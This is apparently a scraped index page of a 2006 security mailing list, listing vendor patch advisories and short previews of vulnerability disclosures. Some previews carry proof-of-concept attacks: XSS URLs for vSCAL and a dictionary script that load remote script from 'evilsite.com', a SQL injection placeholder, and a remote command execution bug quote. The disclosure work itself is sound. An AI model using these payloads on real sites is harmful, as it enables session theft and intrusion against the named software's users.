|
Colapse all |
Post message
Babykatmedia.com scripts - vSCAL & vREAL - XSS Vulns 2006-06-07 luny youfucktard com vSCAL and vREAL v1.0 Homepage: http://www.babykatiemedia.com/ Effected files: index.php myslideshow.php XSS Vulnerability via lid variable: http://www.example.com/vscal/index.php?page=showlisting&lid=<SCRIPT%20SR C=evilsite.com//xss.js></SCRIPT> XSS Vulnerability via myslideshow.php [ more ] [ reply ] Mafia Moblog Full Path Disclosure / SQL injection 2006-06-08 simo64 gmail com Produce : Mafia Moblog WebSite :http://mafia.pearlabs.org Version : 6 Full and Prior Discovred By :Moroccan Security Research Team (Simo64) IMPACT : Manipulation of data, System access [+] Full Path Disclosure : The problem is that it is possible to disclose the full path to 'big.php','upgr [ more ] [ reply ] [ MDKSA-2006:098 ] - Updated postgresql packages fixes SQL injection vulnerabilities. 2006-06-07 security mandriva com PBL Guestbook v1.31 - XSS 2006-06-07 luny youfucktard com PBLGuestbook v1.31 Homepage: http://www.pixelatedbylev.com/ Effected files: input boxes of the guestbook. XSS Vulnerabilities PoC: I noticed that common tags like <script> are filtered into the words "SCRIPT BLOCKED" in this guestbook, however img tags as well as others go unfiltered i [ more ] [ reply ] [ MDKSA-2006:097 ] - Updated MySQL packages fixes SQL injection vulnerability. 2006-06-07 security mandriva com [USN-291-1] FreeType vulnerabilities 2006-06-08 Martin Pitt (martin pitt canonical com) =========================================================== Ubuntu Security Notice USN-291-1 June 08, 2006 freetype vulnerabilities CVE-2006-0747, CVE-2006-1861, CVE-2006-2493, CVE-2006-2661 =========================================================== A security issue affects the follo [ more ] [ reply ] [ MDKSA-2006:096 ] - Updated openldap packages fixes buffer overflow vulnerability. 2006-06-07 security mandriva com [FLSA-2006:190884] Updated squirrelmail package fixes security issues 2006-06-06 Marc Deslauriers (marcdeslauriers videotron ca) [FLSA-2006:190941] Updated ipsec-tools package fixes security issue 2006-06-06 Marc Deslauriers (marcdeslauriers videotron ca) [FLSA-2006:189137-2] Updated firefox package fixes security issues 2006-06-06 Marc Deslauriers (marcdeslauriers videotron ca) Calendar Express 2 SQL injection 2006-06-07 CrAzY CrAcKeR hotmail com ====================================== DISCOVERED BY: CrAzY CrAcKeR Site:www.alshmokh.com I want to thank my friend:- nono225-mHOn-rageh-LoverHacker-Breeeeh BoNy_m-Rootshill-LiNuX_rOOt-SauDiVirUs ====================================== Example: /print/month.php?cid=&catid=[SQL] /print/m [ more ] [ reply ] MiraksGalerie <= 2.62 Multiple Remote command execution 2006-06-07 Federico Fazzi (federico autistici org) */ Federico Fazzi, <federico (at) autistici (dot) org [email concealed]> */ MiraksGalerie <= 2.62 Remote command execution */ 07/06/2006 4:58 Bug: pcltar.lib.php: line 34 - 35 --- if (!isset($g_pcltar_lib_dir)) $g_pcltar_lib_dir = "lib"; [etc..] --- galimage.lib.php: line: 157 - 158 --- for($i=count($listconfigfile)-1; [ more ] [ reply ] [FLSA-2006:190777] Updated X.org packages fix security issue 2006-06-06 Marc Deslauriers (marcdeslauriers videotron ca) [ GLSA 200606-01 ] Opera: Buffer overflow 2006-06-07 Sune Kloppenborg Jeppesen (jaervosz gentoo org) [ GLSA 200606-04 ] Tor: Several vulnerabilities 2006-06-07 Sune Kloppenborg Jeppesen (jaervosz gentoo org) [FLSA-2006:189137-1] Updated mozilla packages fix security issues 2006-06-06 Marc Deslauriers (marcdeslauriers videotron ca) [ GLSA 200606-05 ] Pound: HTTP request smuggling 2006-06-07 Sune Kloppenborg Jeppesen (jaervosz gentoo org) rPSA-2006-0096-1 spamassassin 2006-06-07 Justin M. Forbes (jmforbes rpath com) rPath Security Advisory: 2006-0096-1 Published: 2006-06-07 Products: rPath Linux 1 Rating: Minor Exposure Level Classification: Remote Root Deterministic Unauthorized Access Updated Versions: spamassassin=/conary.rpath.com@rpl:devel//1/3.0.6-0.1-1 References: http://www.cve.mitre.org/cg [ more ] [ reply ] [ GLSA 200606-03 ] Dia: Format string vulnerabilities 2006-06-07 Sune Kloppenborg Jeppesen (jaervosz gentoo org) [HV-LOW] Microsoft NetMeeting memory corruption (Brief) 2006-06-07 vuln hexview com -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Microsoft NetMeeting memory corruption (Brief) Classification: =============== Level: [LOW]-med-high-crit ID: HEXVIEW*2006*06*06*01 URL: http://www.hexview.com/docs/20060606-1.txt Overview: ========= Microsoft NetMeeting is an application that provid [ more ] [ reply ] |
|
Privacy Statement |
Homepage:
http://www.scriptsez.net/
Effected files:
dictionary.php
XSS Vulnerability via keyword variable:
http://www.example.com/dictionary.php?action=browse&keyword=e[SCRIPT SRC=http://evilsite.com/xss.js][/SCRIPT]
[ more ] [ reply ]